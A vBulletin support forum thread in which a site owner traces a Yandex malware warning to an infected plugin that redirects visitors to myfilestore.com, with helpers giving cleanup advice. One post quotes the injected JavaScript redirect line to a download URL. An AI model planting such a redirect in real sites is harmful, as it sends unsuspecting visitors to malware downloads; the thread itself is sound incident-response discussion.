Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 10 Jan 2017, 07:19
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Malicious site warning

When i open my forum in Opera. Malicious site warning has shown
Malicious site warning

This site may be hacked or contain malicious software. Visiting this page may be harmful.

Opera Software strongly discourages visiting this page.
Go back safely
Ignore this warning
Why was this page blocked?


Reported by Yandex
Our fraud reports are maintained by third-party vendors.
But Yandex show, "Your site doesn't have any violations"
How to remove this warning?
forum link: www.pakistanipoint.com

Reply With Quote
  #2  
Old 10 Jan 2017, 17:16
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Real name: Lynne
google "yandex remove site from blacklist" and you should find your answer.
__________________
Former vBulletin.org Staff Member

Try a search before posting for help. Many users won't, and don't, help if the question has been answered several times before.
W3Schools -
Online vBulletin Manual
If I post some CSS and don't say where it goes, put it in the additional.css template.
I will NOT help via PM (you will be directed to post in the forums for help.)
Reply With Quote
  #3  
Old 14 Jan 2017, 14:42
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Originally Posted by Lynne View Post
google "yandex remove site from blacklist" and you should find your answer.
I am working on it almost one week but could not find any malicious code. Now Yandex show my website contains malicious code. I try to scan forum from different malware scanner, all clear my forum.
May you suggest me any malware scanner for scanning?
Reply With Quote
  #4  
Old 14 Jan 2017, 17:33
Kane@airrifle's Avatar
[email protected] Kane@airrifle is offline
 
Join Date: Jun 2011
Real name: Kane
filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added 14 Jan 2017 at 18:29 ---------------

And also protect your admincp folder with a passworded htaccess....
Reply With Quote
  #5  
Old 14 Jan 2017, 18:40
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Originally Posted by [email protected] View Post
filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added 14 Jan 2017 at 18:29 ---------------

And also protect your admincp folder with a passworded htaccess....
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware
Reply With Quote
  #6  
Old 14 Jan 2017, 20:05
z3r0's Avatar
z3r0 z3r0 is offline
 
Join Date: Apr 2005
Location: Lancashire, UK
Originally Posted by creative-friend View Post
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.
Reply With Quote
  #7  
Old 14 Jan 2017, 20:32
Kane@airrifle's Avatar
[email protected] Kane@airrifle is offline
 
Join Date: Jun 2011
Real name: Kane
Originally Posted by creative-friend View Post
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.
Reply With Quote
  #8  
Old 17 Jan 2017, 03:06
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Originally Posted by [email protected] View Post
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.
Originally Posted by z3r0 View Post
You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.
thank you so much

--------------- Added 17 Jan 2017 at 03:10 ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt file

--------------- Added 17 Jan 2017 at 03:23 ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake

The following malicious code appears at your site from time to time:

document.location='http://myfilestore.com/download.php?id=ed4d0ec3'

when the following URL is loaded:

http://www.pakistanipoint.com/misc.p...22&js=js123456

Please, check your files and remove the malicious code.
Attached Files
File Type: txt 2580953&postcount=8code.txt (2.5 KB, 1 views)

Last edited by Joshua G.; 25 Apr 2018 at 18:17. Reason: Added "123456" to the js link and removed code as some browsers may detect them as a threat. See attached txt file for code.
Reply With Quote
  #9  
Old 17 Jan 2017, 03:58
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
Originally Posted by creative-friend View Post
thank you so much

--------------- Added 17 Jan 2017 at 03:10 ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt for code


--------------- Added 17 Jan 2017 at 03:23 ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake
Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
**Edit - Code to remove is marked by [Remove This Code] in attached file.
Attached Files
File Type: txt 2580957&postcount=9Code.TXT (2.6 KB, 2 views)

Last edited by Joshua G.; 25 Apr 2018 at 18:21. Reason: Removed code as some browsers are detecting as threat. See code in attached txt file and remove code marked between [Remove This Code] tags
Reply With Quote
  #10  
Old 17 Jan 2017, 04:16
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Originally Posted by TheLastSuperman View Post
afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
Thank you so much sir

I cannot find how to save plugin display order
Reply With Quote
  #11  
Old 17 Jan 2017, 04:26
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
 
Join Date: Sep 2008
Real name: Michael Miller Jr
Originally Posted by creative-friend View Post
Thank you so much sir

I cannot find how to save plugin display order
AdminCP > Plugins & Products > Plugin Manager > *Now scroll to the bottom of the plugin list and click "Save Active Status" button.
__________________
Daddy Does Dios and Figs!

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
Reply With Quote
  #12  
Old 17 Jan 2017, 04:33
creative-friend creative-friend is offline
 
Join Date: Feb 2009
ok sir
thanks
Reply With Quote
  #13  
Old 01 May 2017, 19:42
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Originally Posted by TheLastSuperman View Post
Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
I removed the code and my forum working fine. After some time forum start to redirect myfilestore.com. I disabled "Auto Check Remember Me & Rules Boxes" product and forum not redirect. Today i noticed that forum again start to redirect myfilestore, when i disable "Chrome Browser Notice by BOP5" product and forum not redirect. After few minutes, i enabled both products "Auto Check Remember Me & Rules Boxes" and "Chrome Browser Notice by BOP5" but forum working fine.
I could not find malicious code in both product.
Why forum again redirect to myfilestore? any suggestion?
Reply With Quote
Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
Administrative and Maintenance Tools secureWorks: Protect your forum from accidental / malicious thread delete ibautocommunity vBulletin 3.7 Add-ons 4 23 Aug 2009 11:15



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 23:22.

Layout Options | Width: Wide Color: